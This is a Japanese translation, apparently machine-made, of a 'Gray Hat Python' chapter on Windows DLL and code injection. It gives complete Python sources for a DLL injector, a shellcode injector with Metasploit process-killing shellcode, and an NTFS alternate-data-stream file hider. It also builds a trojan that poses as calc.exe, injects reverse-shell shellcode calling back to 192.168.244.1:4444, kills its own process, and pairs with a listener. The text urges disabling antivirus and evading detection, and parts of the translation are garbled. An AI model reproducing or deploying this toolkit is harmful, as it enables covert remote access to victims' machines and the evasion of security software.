Gray Hat Python-DLLおよびコードインジェクション

イントロ

プログラムをリバースまたは攻撃する場合、調査中のプロセスのコンテキストでコードをダウンロードして実行できると便利な場合があります。 パスワードハッシュを盗むか、ターゲットシステムのリモートデスクトップにアクセスするかにかかわらず、コードとdllライブラリを挿入する方法は強力な機能を提供します。 両方の方法を使用できる単純なPythonユーティリティをいくつか作成します。 これらのメソッドは、プログラム、エクスプロイト、シェルコード、およびペンテスターのすべての開発者の武器庫の一部である必要があります。 DLLインジェクションを使用して、別のプロセス内でポップアップウィンドウを起動します。 また、コードインジェクションを使用して、PIDに基づいてプロセスを強制終了するように設計されたシェルコードをテストします。 この章の最後で、Pythonで完全に記述されたトロイの木馬（バックドア機能付き）を作成してコンパイルします。 彼は、コードの実装と、あらゆる優れたバックドアが使用すべき他の隠された戦術の使用に大きく依存しています。 両方の実装方法の基礎となるリモートスレッドの作成のトピックから見ていきましょう。

7.1リモートスレッドの作成

DLLインジェクションとコードインジェクションにはいくつかの大きな違いがありますが、両方の方法は同じ方法で、つまりリモートスレッドを作成することで実現されます。 リモートスレッドは、Kernel32.dllからエクスポートされるWin32 APIの一部であるCreateRemoteThread（）関数[1]を使用して作成されます 。 彼女には次のプロトタイプがあります。

HANDLE WINAPI CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

心配しないでください、彼女には多くのパラメーターがありますが、それらはすべて直感的です。 最初のパラメーターhProcessは、よく知っているはずです。 これは、スレッドを開始するプロセスへのハンドルです。 lpThreadAttributesパラメーターは、新しく作成されたスレッドのセキュリティ記述子を設定するだけで、子プロセスがスレッド記述子を継承できるかどうかを示します。 値をNULLに設定します。これにより、継承されないストリーム記述子とデフォルトのセキュリティ記述子が提供されます。 dwStackSizeパラメーターは、作成されるストリームのスタックサイズを設定するだけです。 これをゼロに設定すると、プロセスで既に使用されているデフォルトのサイズが与えられます。 次のlpStartAddressパラメーターは、最も重要なパラメーターの1つです。 スレッドが実行を開始するメモリ内の場所を示します。 実装を容易にするために必要なコードが実行されるように、このアドレスを正しく設定することが非常に重要です。 次のパラメーターlpParametrは、前のパラメーターとほぼ同じくらい重要です。 これにより、lpStartAddressで指定されたストリーム関数に渡される変数へのポインターを提供できます。 これは最初はわかりにくいかもしれませんが、すぐに、このパラメーターがDLLの実装にとってどれほど重要であるかがわかります。 dwCreationFlagsパラメーターは、スレッドの開始方法を決定します。 常にゼロに設定します。つまり、スレッドは作成後すぐに実行されます。 dwCreationFlagsがサポートする他の値については、MSDNのドキュメントを自由にチェックしてください。 lpThreadIdパラメーターは最後です。 新しく作成されたストリームの識別子（ID）が入力されます。



挿入されたコードの作成を担当する関数のメインコールが理解できたので、リモートプロセスにDLLを埋め込むためにその使用の問題を調べ、シェルコードの実装に徐々に進みます。 リモートストリームを作成し、最終的にコードを実行する手順は、特定のケース（DLLとシェルコードの実装）ごとにわずかに異なるため、2回使用してすべての違いをカバーします。



7.1.1 DLLインジェクション



DLLの導入はかなり長い間、善と悪の両方に使用されてきました。 どこを見ても、どこでもDLL実装が表示されます。 珍しいWindowsシェル拡張から、銀行情報を盗むマルウェアまで。 DLLの実装はどこにでもあります。 セキュリティ製品でさえ、悪意のあるアクティビティを追跡するために独自のDLLを展開しています。 DLLインジェクションを使用することの目的は、バイナリファイルをコンパイルし、プロセスにロードして、プロセスの一部として実行できることです。 これは、たとえば、特定のアプリケーションのみが発信接続を許可するソフトウェアファイアウォールをバイパスする場合に非常に便利です。 PythonでDLLインジェクターを作成するときに、このトピックを少し調査します。これにより、選択したプロセスにDLLを埋め込むことができます。



DLLをWindowsプロセスのメモリにロードするには、 kernel32.dllからエクスポートされたLoadLibrary（）関数を使用する必要があります。 彼女には次のプロトタイプがあります。

 HMODULE LoadLibrary( LPCTSTR lpFileName );
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

lpFileNameパラメーターは、DLLをロードするためのものです。 リモートプロセスが、ロードされたDLLへのパスを含む文字列へのポインターを使用してLoadLibraryAを呼び出すように強制する必要があります。 最初のステップは、LoadLibraryA関数の場所を見つけることです。 次に、ロードされたDLLの名前を書き込みます。 CreateRemoteThread（）を呼び出すときは、lpStartAddressパラメーターでLoadLibraryAのロケーションアドレスを指定し、lpParameterに「DLLへのパス（名前）」のロケーションアドレスを配置します。 CreateRemoteThread（）の実行が開始されると、LoadLibraryAが呼び出されます。これは、リモートプロセスがDLL自体をロードする要求を作成した場合と同じです。



注： 実装をテストするため の DLLは、この本のソースアーカイブにあります。これはwww.nostarch.com/ghpython.htmからダウンロードできます。 DLLのソースコードも内部にあります。



コードに移りましょう。 新しいPythonファイルを開き、 dll_injector.pyという名前を付けて、次のコードを入力します。



dll_injector.py

 import sys from ctypes import * PAGE_READWRITE = 0x04 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) kernel32 = windll.kernel32 pid = sys.argv[1] dll_path = sys.argv[2] dll_len = len(dll_path) # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) (#1): # Allocate some space for the DLL path arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE) (#2): # Write the DLL path into the allocated space written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written)) (#3): # We need to resolve the address for LoadLibraryA h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") h_loadlib = kernel32.GetProcAddress(h_kernel32,"LoadLibraryA") (#4): # Now we try to create the remote thread, with the entry point set # to LoadLibraryA and a pointer to the DLL path as its single parameter thread_id = c_ulong(0) if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)): print "[*] Failed to inject the DLL. Exiting." sys.exit(0) print "[*] Remote thread with ID 0x%08x created." % thread_id.value
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

最初のステップ（＃1）では 、埋め込みDLLのパスを保存するのに十分なメモリを割り当て、このパスを新しく割り当てられたメモリ（＃2）に書き込む必要があります。 次に、LoadLibraryA （＃3）関数のアドレスを見つけて、CreateRemoteThread（） （＃4）関数の呼び出しに渡す必要があります。 作成されたスレッドが実行を開始するとすぐに、埋め込まれたDLLが攻撃されたプロセスに読み込まれ、その後、実装が成功したことを示すポップアップダイアログボックスが表示されます。 以下に示すスクリプトを使用します。

 ./dll_injector <PID> <Path to DLL>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

DLL実装の実装方法の良い例があります。 埋め込みDLLにはペイロードが含まれていませんが、実装技術自体を理解することは重要です。 それでは、コードの実装に移りましょう！



7.1.2コードインジェクション



もっと陰湿なものに移りましょう。 コードの実装により、ディスク上に痕跡を残さずに、メモリでの即時実行により、生のシェルコードを作業プロセスに埋め込むことができます。 これは、攻撃者がシェル接続をあるプロセスから別のプロセスに、攻撃後に移行できるようにするものでもあります。



特定のPIDでプロセスを単純に終了する単純なシェルコードを取得します。 これにより、リモートプロセスに移動し、元々実行していたプロセスを強制終了できます。これにより、トラックをカバーできます。



これは、最終的に作成するトロイの木馬の重要な機能です。 また、あなたのニーズを満たすために、シェルコードを安全に置き換えて、少しモジュール化できるようにする方法を紹介します。



プロセスを強制終了するシェルコードを取得するには、Metasploitプロジェクトのホームページにアクセスして、便利なシェルコードジェネレーターを使用します。 以前に使用したことがない場合は 、 metasploit.com / shellcodeにアクセスして試してください。 このケースでは、ジェネレーターを使用してWindows実行コマンドシェルコードを作成しました（リスト7-1を参照）。 対応する設定も表示されます：



リスト7-1： Metasploitプロジェクトのオンラインジェネレーターによって生成されたシェルキラーシェルコード。

 /* win32_exec - EXITFUNC=thread CMD=taskkill /PID AAAAAAAA Size=152 Encoder=None http://metasploit.com */ unsigned char scode[] = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" "\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" "\xe7\x74\x61\x73\x6b\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41" "\x41\x41\x41\x41\x41\x41\x41\x00";
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

シェルコードができたので、今度はプログラミングに戻り、埋め込みコードがどのように機能するかを示します。 新しいPythonファイルを開き、 code_injector.pyという名前を付けて、次のコードを入力します。



code_injector.py

 import sys from ctypes import * # We set the EXECUTE access mask so that our shellcode will # execute in the memory block we have allocated PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) kernel32 = windll.kernel32 pid = int(sys.argv[1]) pid_to_kill = sys.argv[2] if not sys.argv[1] or not sys.argv[2]: print "Code Injector: ./code_injector.py <PID to inject> <PID to Kill>" sys.exit(0) #/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA #Size=159 Encoder=None http://metasploit.com */ shellcode = \ "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" \ "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" \ "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" \ "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" \ "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" \ "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" \ "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" \ "\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" \ "\xe7\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b" \ "\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00" (#1): padding = 4 - (len( pid_to_kill )) replace_value = pid_to_kill + ( "\x00" * padding ) replace_string= "\x41" * 4 shellcode = shellcode.replace( replace_string, replace_value ) code_size = len(shellcode) # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) # Allocate some space for the shellcode arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) # Write out the shellcode written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written)) # Now we create the remote thread and point its entry routine # to be head of our shellcode thread_id = c_ulong(0) (#2): if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None, 0,byref(thread_id)): print "[*] Failed to inject process-killing shellcode. Exiting." sys.exit(0) print "[*] Remote thread created with a thread ID of: 0x%08x" % thread_id.value print "[*] Process %s should not be running anymore!" % pid_to_kill
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

すでにコードの一部を知っていますが、いくつかの興味深いトリックがあります。 最初に行うことは、シェルコード（＃1）のマーカー行（\ x41 \ x41 \ x41 \ x41 \ x00）を完了するプロセスのPIDに置き換えることです。 もう1つの顕著な違いは、CreateRemoteThread（） （＃2）関数を呼び出す方法です。 パラメータlpStartAddressがシェルコードの先頭を指すようになりました。 また、関数に何も渡す必要がないため、lpParameterをNULLに設定します。代わりに、スレッドにシェルコードの実行を開始させるだけです。



スクリプトを実行する前に、いくつかのcmd.exeプロセスを実行し、対応するPIDを取得してから、次に示すようにスクリプトを実行します。

 ./code_injector.py <PID to inject> <PID to kill>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

適切なコマンドライン引数を使用してスクリプトを実行すると、正常に作成されたストリームが表示されます（スクリプトはストリームIDを返します）。 また、選択したcmd.exeプロセスが強制終了されたことにも注意してください。



これで、別のプロセスでシェルコードをロードして実行する方法がわかりました。 これは、シェルコードを使用してコールバック関数を設定するときだけでなく、ディスク上にコードがないため、トレースを非表示にするときにも便利です。 ここで、学習した情報の一部を使用し、バックドアを作成します。バックドアは、攻撃されたマシン上で実行されたときにいつでもリモートアクセスできるようにします。 悪の側に行こう！

7.2悪の側に

悪意のために習得したスキルを使用します。 次に、システムの実行中にいつでもシステムを制御するために使用できる小さなバックドアを作成します。 実行可能ファイルの実行が開始されると、ユーザーが実行したい元のプログラムを起動します（たとえば、バイナリcalc.exeと元のcalc.exeを呼び出して、既知の場所に転送します ）。 2番目のプロセス（元のcalc.exe ）が読み込まれると、リモートマシンに接続するコードを挿入します。 シェルコードが実行され、 シェル （リモートマシンとの通信）ができたら、攻撃の実行元プロセスに2番目のコードを導入します。



ちょっと！ calc.exeを終了させていただけますか？ 要するに、はい。 しかし、プロセスの完了は、バックドアによってサポートされる重要な技術です。 たとえば、前の章で学んだコードと知識を組み合わせて、機能するアンチウイルスまたはファイアウォールを見つけて、それらを殺すことができます。 もちろん、不要になった場合、あるプロセスから別のプロセスに移動できると同時に、移動したプロセスを強制終了できることも重要です。



このパートでは、PythonスクリプトをEXEにコンパイルする方法と、メインの実行可能ファイルでDLLを非表示にする方法も示します。 ちょっとしたトリックを使って、うさぎとともにEXEファイルとともに渡すDLLを作成する方法を見てみましょう。



7.2.1ファイルの非表示



実装されたDLLをバックドアで安全に配布し、あまり注目されないようにするには、ファイルを保存するための隠された方法が必要です。 2つの実行可能ファイル（DLLを含む）を取り、それらを1つのファイルに結合するラッパー（約、レーンはジョイナーを意味します）を使用できますが、この本はPythonを使用したハッキン​​グに関するものなので、もう少し創造的である必要があります。



実行可能ファイル内のファイルを非表示にするために、Alternate Data Streams（ADS）と呼ばれるNTFSファイルシステムの既存の機能を悪用します。 代替データストリームは、Windows NT 3.1で初めて登場し、Appleの階層ファイルシステム（HFS）と対話する手段として導入されました。 ADSを使用すると、ディスク上に1つのファイルを作成し、メインの実行可能ファイルに添付されたストリームにDLLを保存できます。 ストリームとは、ディスク上に表示されるファイルに添付されている隠しファイルにすぎません。



代替データストリームを使用する場合、ユーザーの直接の視線からDLLを隠します。 特別なツールがなければ、コンピューターユーザーはADSの内容を見ることができません。これは私たちにとって理想的です。 さらに、多くのセキュリティ製品は代替スレッドを適切にスキャンしないため、それらを回避して検出を回避する可能性が十分にあります。



代替ストリームを使用するには、以下に示すように、コロンと隠しオブジェクトのファイル名を既存のファイルに追加する必要があります。

 reverser.exe:vncdll.dll
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

この場合、 vncdll.dllを取得します 。これは、 reverser.exeファイルに添付されている代替データストリームに格納されています。 ファイルから代替ストリームを単に読み書きする小さなスクリプトを書きましょう。 新しいPythonファイルを開き、 file_hider.pyという名前を付けて、次のコードを入力します。



file_hider.py

 import sys # Read in the DLL fd = open( sys.argv[1], "rb" ) dll_contents = fd.read() fd.close() print "[*] Filesize: %d" % len( dll_contents ) # Now write it out to the ADS fd = open( "%s:%s" % ( sys.argv[2], sys.argv[1] ), "wb" ) fd.write( dll_contents ) fd.close()
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

特別なことはありません-最初のコマンドライン引数は読み取る必要があるDLLで、2番目の引数はDLLが代替ストリームに書き込まれるファイルです。 この単純なスクリプトを使用して、実行可能ファイル内にあらゆる種類のファイルを保存できます。ADSから直接DLLを実装することもできます。 バックドアではDLLインジェクションを使用しませんが、引き続きサポートされますので、先に進んでください。



7.2.2バックドアコード



選択したアプリケーションを単に起動する「実行リダイレクトコード」を作成することから始めましょう。 コードの名前の理由は「実行リダイレクト」です。これは、バックドアcalc.exeを呼び出し、元のcalc.exeを別の場所に移動するためです。 ユーザーが電卓を起動しようとすると、うっかりバックドアを起動します。バックドアは実際の電卓を起動するため、ユーザーに疑いをかけません。 第3章の my_debugger_defines.pyファイルを含めることに注意してください。このファイルには、プロセスを作成するために必要なすべての定数と構造が含まれています。 新しいPythonファイルを開き、 backdoor.pyという名前を付けて、次のコードを入力します。



backdoor.py

 # This library is from Chapter 3 and contains all # the necessary defines for process creation #     3.    #      import sys from ctypes import * from my_debugger_defines import * kernel32 = windll.kernel32 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) # This is the original executable path_to_exe = "C:\\calc.exe" startupinfo = STARTUPINFO() process_information = PROCESS_INFORMATION() creation_flags = CREATE_NEW_CONSOLE startupinfo.dwFlags = 0x1 startupinfo.wShowWindow = 0x0 startupinfo.cb = sizeof(startupinfo) # First things first, fire up that second process # and store its PID so that we can do our injection kernel32.CreateProcessA(path_to_exe, None, None, None, None, creation_flags, None, None, byref(startupinfo), byref(process_information)) pid = process_information.dwProcessId
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

コードはそれほど複雑ではありません;あなたにとって新しいことは何もありません。 コードの実装に進む前に、この非常に注入されたコードを非表示にする方法を検討します。 バックドアコードに直接追加しましょう。 プロセス作成セクションの直後にコードを添付してください。 実装関数は、埋め込みコードと埋め込みDLLの両方で機能します。 「パラメータ」を「1」に設定し、DLLへのパスを「データ」変数に入れるだけです。 ここでは、清潔さは守りませんが、迅速かつ汚い行動をします。 backdoor.pyファイルに埋め込み関数を追加しましょう。



backdoor.py

 ... def inject( pid, data, parameter = 0 ): # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) arg_address = kernel32.VirtualAllocEx(h_process, 0, len(data), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, data, len(data), byref(written)) thread_id = c_ulong(0) if not parameter: start_address = arg_address else: h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") start_address = kernel32.GetProcAddress(h_kernel32,"LoadLibraryA") parameter = arg_address if not kernel32.CreateRemoteThread(h_process,None, 0,start_address,parameter,0,byref(thread_id)): print "[*] Failed to inject the DLL. Exiting." sys.exit(0) return True
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

バックドアは、「コードインジェクション」と「DLLインジェクション」の両方を処理できるインジェクション機能をサポートしています。 次に、2つの部分で構成されるシェルコードを挿入します。 1つは「シェル」（攻撃者との通信用のシェル）を提供することを目的とし、もう1つはプロセスを完了するためのものです。 バックドアにコードを追加していきましょう。



backdoor.py

 ... # Now we have to climb out of the process we are in # and code inject our new process to kill ourselves #/* win32_reverse - EXITFUNC=thread LHOST=192.168.244.1 LPORT=4444 Size=287 Encoder=None http://metasploit.com */ connect_back_shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" \ "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" \ "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" \ "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" \ "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" \ "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" \ "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" \ "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" \ "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" \ "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68" \ "\xc0\xa8\xf4\x01\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9" \ "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" \ "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3" \ "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" \ "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" \ "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6" \ "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6" \ "\xff\x77\xfc\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0" inject( pid, connect_back_shellcode ) #/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA #Size=159 Encoder=None http://metasploit.com */ our_pid = str( kernel32.GetCurrentProcessId() ) process_killer_shellcode = \ "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" \ "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" \ "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" \ "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" \ "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" \ "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" \ "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" \ "\x83\xc0\x7b\x50\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff" \ "\xe7\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b" \ "\x6b\x69\x6c\x6c\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00" padding = 4 - ( len( our_pid ) ) replace_value = our_pid + ( "\x00" * padding ) replace_string= "\x41" * 4 process_killer_shellcode = process_killer_shellcode.replace( replace_string, replace_value ) # Pop the process killing shellcode in inject( our_pid, process_killer_shellcode )
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

いいね！プロセスID（PID）をバックドアに渡し、生成したプロセス（calc.exe）にシェルコードを埋め込みます。その後、バックドアを殺します。これで、いくつかのトリックを使用した非常に優れたバックドアができましたが、最も重要なことは、誰かが電卓を起動するたびに、攻撃されたマシンにアクセスできることです。侵害されたシステムがあり、このシステムのユーザーがパスワードで保護されたアプリケーションまたは関心のあるアプリケーションにアクセスできる場合、戦闘状態でこのアプローチを使用できます。この場合、ファイルを置き換えて、起動直後にそのようなアプリケーションの操作の結果に自分自身をくさびで留めることができます。ユーザーがスプーフィングされたアプリケーションを起動してシステムにログインするたびに、キーストロークの監視、ネットワークパケットの傍受などを開始できるシェル（シェル）を取得します。 1つの小さなことを解決する必要があります。スクリプトを実行するために必要なPythonがインストールされていますか？続きを読むと、次のようなすばらしいPythonライブラリについて学ぶことができます。py2exeを使用すると、Pythonスクリプトを実際のWindows実行可能ファイルに変換できます。 exeファイル。



py2exe使い方7.2.3



ライブラリpy2exeを [2] 、本格的なWindows実行ファイルにPythonスクリプトをコンパイルすることが可能です。使用する前に、コンパイルするものを決定する特別なインストールスクリプトを作成する必要があります。バックドアをコンパイルするために、かなり単純なスクリプトを作成します。新しいファイルを開き、setup.pyという名前を付けて、次のコードを入力します。



setup.py

 # Backdoor builder from distutils.core import setup import py2exe setup(console=['backdoor.py'], options = {'py2exe':{'bundle_files':1}}, zipfile = None, )
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

はい、彼はとてもシンプルです。インストール機能に渡されたパラメーターを見てみましょう。最初のパラメーター「console」は、コンパイルするメインスクリプトの名前です。オプションとzipfileパラメーターは、Python DLLと他のすべての依存モジュールをメイン実行可能ファイルに結合するように設定されます。これにより、Pythonが存在しないシステムに転送できるという意味で、バックドアがモバイルになり、動作します。コンパイルする前に、ファイルmy_debugger_defines.py、backdoor.py、およびsetup.pyが同じディレクトリにあることを確認してください。次に、コマンドラインに移動し、以下に示すようにインストールスクリプトを実行します。

 python setup.py py2exe
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

その後、コンパイルプロセスからの出力が表示され、その後に2つのdistおよびbuildディレクトリが作成されます。distフォルダーのヌートリアでは、backdoor.exeがあなたを待っています。名前をcalc.exeに変更し、テスト用のターゲットシステムにコピーします。次に、「C：\ WINDOWS \ system32 \」から元のcalc.exeをコピーし、ドライブ「C：\」のルートに配置します。次に、バックドアcalc.exeを「C：\ WINDOWS \ system32 \」に移動します。これで、リモートシステムでシェルを操作するために必要なのは、コマンドを送受信するための簡単なスクリプトを書くことだけです。新しいPythonファイルを開き、backdoor_shell.pyという名前を付けます次のコードを入力します。



backdoor_shell.py

 import socket import sys host = "192.168.244.1" port = 4444 server = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) server.bind( ( host, port ) ) server.listen( 5 ) print "[*] Server bound to %s:%d" % ( host , port ) connected = False while 1: #accept connections from outside if not connected: (client, address) = server.accept() connected = True print "[*] Accepted Shell Connection" buffer = "" while 1: try: recv_buffer = client.recv(4096) print "[*] Received: %s" % recv_buffer if not len(recv_buffer): break else: buffer += recv_buffer except: break # We've received everything, now it's time to send some input command = raw_input("Enter Command> ") client.sendall( command + "\r\n\r\n" ) print "[*] Sent => %s" % command
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

これは、接続を待機してソケットの読み取り/書き込みを行うだけの非常に単純なソケットサーバーです。環境のホスト変数とポート変数のセットを使用して、サーバーを起動します。次に、calc.exeを実行しますリモートシステム上（ローカルコンピューターでも同じように動作します）。次に、電卓ウィンドウが表示され、ソケットサーバーが接続を登録し、データを取得します。リモートシステムからデータを受信するサイクルを中断するには、CTRL-Cを押します。これにより、コマンドを入力できます。ここでは、Windowsのネイティブシェルシェルコマンドであるdir、cd、またはtypeなどのコマンドを試すことができます。各コマンドを入力すると、その結果が表示されます。これで、バックドアと対話するための効果的でわずかに見えない手段ができました。想像力を駆使して機能を拡張してください。慎重に考え、アンチウイルスを回避してください。 Pythonでそのようなものを開発する利点は、速度、使いやすさ、再利用性です。



この章で見たように、コードとDLLの実装は2つの非常に便利で強力な手法です。これで、ペンテストまたはリバース中に便利になる新しいスキルが装備されました。次の章では、Pythonベースのファザーの使用に焦点を当てます。ネイティブツールと一部のオープンソースツールの両方が検討されます。



参照資料



[1] MSDN CreateRemoteThread関数（http://msdn.microsoft.com/en-us/library/ms682437.aspx）を参照してください



[2] py2exeのダウンロードについては、（http://sourceforge.net/project/showfilesにアクセスしてください。 .php？group_id = 15583）



出所